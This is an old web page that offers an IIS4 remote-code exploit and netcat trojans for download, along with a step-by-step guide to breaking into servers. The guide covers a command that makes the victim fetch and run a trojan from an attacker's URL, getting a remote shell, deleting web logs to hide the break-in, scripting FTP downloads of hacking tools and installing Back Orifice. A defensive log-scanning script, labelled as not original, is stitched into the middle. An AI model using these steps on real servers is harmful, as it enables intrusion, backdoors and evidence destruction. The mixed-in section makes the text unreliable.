Welcome to NT Bugs

Here, you will find out why Windows may be the desktop of choice, but SHOULD NOT BE USED AS A SERVER.
A very serious bug in IIS4 has been found, that lets anybody in the world get a DOS prompt in the server, even if it is behind the best firewall. The exploit programs are included so you can find out if your own server is vulnerable. (Please do not hack into other peoples' servers with this, that might be illegal!)
Win32 (assembly) source code: iishack.asm (12,523 bytes)
Unix (C) source code: iishack.c (9,935 bytes)
Exploit program: iishack.exe (3,526 bytes)
Trojan (port 80): ncx.exe (31,744 bytes)
Trojan (port 99): ncx99.exe (59,392 bytes)

How it works:
When you run iishack.exe with the correct options, it sends a very large request to the web server containing a small 500-byte program. Due to very poor quality programming in IIS, the server runs this little program you send it. The program fetches the trojan (in this case ncx.exe or ncx99.exe) from the URL you specify when you run iishack.exe and then runs it. The trojan included here is a modified version of netcat (a UNIX utility) that binds to a port and waits for a connection. When it receives a connection, it runs cmd.exe (which gives you a DOS prompt) and you have access to the server. Big thanks to the eEye Digital Security Team for finding this hole and writing the exploit!
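One defensive check that follows from the description above, added here as an example that is not from the original page or from eEye: the attack arrives as a single oversized HTTP request, so a script that compares every logged URI against the longest URL your site legitimately serves will flag it. The log lines, the client address, the W3C extended field layout and the 1024-byte threshold are all assumptions made for this example.

```python
MAX_URI_LEN = 1024  # assumed threshold; tune to your longest legitimate URL

# Constructed sample in W3C extended log format; the third record mimics
# the oversized request the attack above sends (the attacker's IP and the
# 500 status are made up for this example).
SAMPLE_LOG = """#Software: constructed sample
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-06-15 02:14:07 10.0.0.5 GET /default.htm - 200
1999-06-15 02:14:09 10.0.0.5 GET /images/logo.gif - 200
1999-06-15 02:15:30 192.0.2.77 GET /{} - 500
1999-06-15 02:15:31 10.0.0.8 GET /about.htm - 200
""".format("A" * 3000)


def parse_w3c(text):
    """Yield one dict per data record, mapping columns by the most recent
    #Fields directive so the parser does not depend on a fixed column order."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
        elif not line or line.startswith("#") or fields is None:
            continue  # blank line, other directive, or data before #Fields
        else:
            values = line.split()
            if len(values) == len(fields):  # skip malformed rows
                yield dict(zip(fields, values))


def find_oversized_requests(text, max_uri_len=MAX_URI_LEN):
    """Return (client ip, status, uri length) for every request whose URI
    (stem plus query string) is longer than max_uri_len."""
    hits = []
    for rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")  # W3C logs write '-' for none
        length = len(stem) + (0 if query == "-" else len(query) + 1)
        if length > max_uri_len:
            hits.append((rec.get("c-ip"), rec.get("sc-status"), length))
    return hits


if __name__ == "__main__":
    for ip, status, length in find_oversized_requests(SAMPLE_LOG):
        print("oversized request from %s: %d bytes (status %s)" % (ip, length, status))
```

Because IIS4 crashes on the request and the page notes that the newest W3SVC log gets deleted afterwards, run this against log copies shipped to another host rather than the server's own \winnt\system32\logs directory.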

How to break into your server:
First of all, you need to take ncx.exe and/or ncx99.exe and put it on some other web site. You can probably put it on geocities or tripod or something. Then, at a DOS prompt on your computer, type this:
iishack www.example.com 80 www.myhomepage.com/mydirectory/ncx.exe
This will connect to www.example.com at port 80, and send the attack. The victim server will then download http://www.myhomepage.com/mydirectory/ncx.exe and run it.
Here is the usage from the program:
(c) dark spyrit -- [email protected].
http://www.eEye.com
[usage: iishack <host> <port> <url>]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
Once the attack is sent, IIS4 on the victim server (www.example.com) will crash, and your trojan program (ncx.exe) will be downloaded and run. Then, telnet to the server at port 80 (ncx.exe) or port 99 (ncx99.exe) and if you were successful, you'll get a DOS prompt. Remember, the victim server might need a few seconds to download the trojan. If you telnet to it before it has downloaded it, it will refuse the connection. Just keep trying. If you're still not in after 30 seconds, you can give up, and try again after the server is rebooted. If you used the port 99 trojan and it doesn't work, make sure you can download the trojan from the URL you used when running iishack.exe. If you have tried everything and you can only make IIS4 crash, then this exploit won't work on that particular server. (Don't think it is secure though, another exploit could work if it was modified a little bit)

Should I use port 80 or port 99?
First, before you do anything, telnet to the victim server at port 99. If it refuses the connection, this is good (it means it's not firewalled) and you can use the port 99 trojan. If the connection times out, it is probably firewalled, and you must use the port 80 trojan. Use the port 99 one if you can, port 80 might fail (it might have trouble binding to the port if the web server crashes too slowly). Also, if somebody browses a site on the server right after running the trojan, it might get the DOS prompt instead of you. Using port 80 can let you get through any firewall, though.

Tips on using it
Once you are in, you can delete the log file so you don't leave any trace of your entry. You start out in \winnt\system32, do a "cd logs" then "cd w3svc1" and do "dir /od" to find the most recent log. It will probably be 65k in size. Deleting this will remove all record of the break-in. Once you're in, don't exit until you have finished everything; it will only accept one telnet, and once it's finished you don't get a second chance until your administrator comes in the next morning and finds it dead. Do not run anything interactive (such as ftp), your telnet session can't control it properly and you will be stuck. You might consider trying to install Back Orifice 2000 from CDC for complete remote control of the server.

How to upload / download files inside telnet?
Once a hacker has access to your machine, he will need to download his favorite hacks and remote-control program like Back Orifice. FTP is probably the easiest way, but you can't do it interactively. Here's how to use it from a really dumb terminal:
C:\> echo anonymous > myscript.txt
C:\> echo [email protected] >> myscript.txt
C:\> echo cd pub >> myscript.txt
C:\> echo binary >> myscript.txt
C:\> echo get hacktool.exe >> myscript.txt
C:\> echo bye >> myscript.txt
C:\> ftp -s:myscript.txt ftp.myserver.com
C:\> del myscript.txt
You should now have hacktool.exe in your current directory. If the server is behind a firewall, you'll have to be more creative.

How to protect your server
As long as you are running NT, you can never be secure. There will always be more bugs coming that can make your life even more miserable than it already is. To completely fix the problem, you should be using an Apache web server running Sun Microsystems Solaris on UltraSPARC hardware. If you are a cheap bastard and don't want to buy quality hardware, you could always run Linux on your existing server hardware.
Good luck!

Interesting reading:

Microsoft doesn't care about bugs
http://ntbugs.aaronkwok.com/sendmeto/nobugs?http://www.cantrip.org/nobugs.html

From Microsoft Word to Microsoft World: How Microsoft is Building a Global Monopoly
(Amazingly, much of this is echoed in the USDOJ's Findings of Fact)
http://ntbugs.aaronkwok.com/sendmeto/msworld?http://netaction.org/msoft/world/MSWord2World.html

Microsoft Windows NT Server 4.0 versus UNIX
http://ntbugs.aaronkwok.com/sendmeto/unix-vs-nt?http://www.unix-vs-nt.org/kirch/

A review of Sun Solaris vs NT
http://ntbugs.aaronkwok.com/sendmeto/standish-syst?http://www.standishgroup.com/syst.html

NT Religious Wars: Why Are DARPA Researchers Afraid of Windows NT?
http://ntbugs.aaronkwok.com/sendmeto/darpa?http://www.dyncorp-is.com/darpa/meetings/win98aug/wars.html

Microsoft left backdoor in win95/98/nt4/2000 for U.S. Government to spy on you
http://ntbugs.aaronkwok.com/sendmeto/backdoor?http://www.cryptonym.com/hottopics/msft-nsa.html

Internet Explorer crashing and exploits
http://ntbugs.aaronkwok.com/sendmeto/iecrashing?http://www.whitehats.com/guninski/browsers.html

Former Microsoft contractor says the company deliberately misled Government buyers:
NT 3.5 with SP3 (with NO networking installed) is actually the only C2 certified OS
http://ntbugs.aaronkwok.com/sendmeto/ntgov1?http://www.ntgov.com/archives/gcn/1998/October26/8.htm

NT critic gets audience with DOD chieftains
http://ntbugs.aaronkwok.com/sendmeto/ntgov2?http://www.ntgov.com/archives/gcn/1998/October12/1c.htm

C2 rating aside, NT isn't secure
http://ntbugs.aaronkwok.com/sendmeto/ntgov3?http://www.gcn.com/archives/gcn/1995/September4/nthole.htm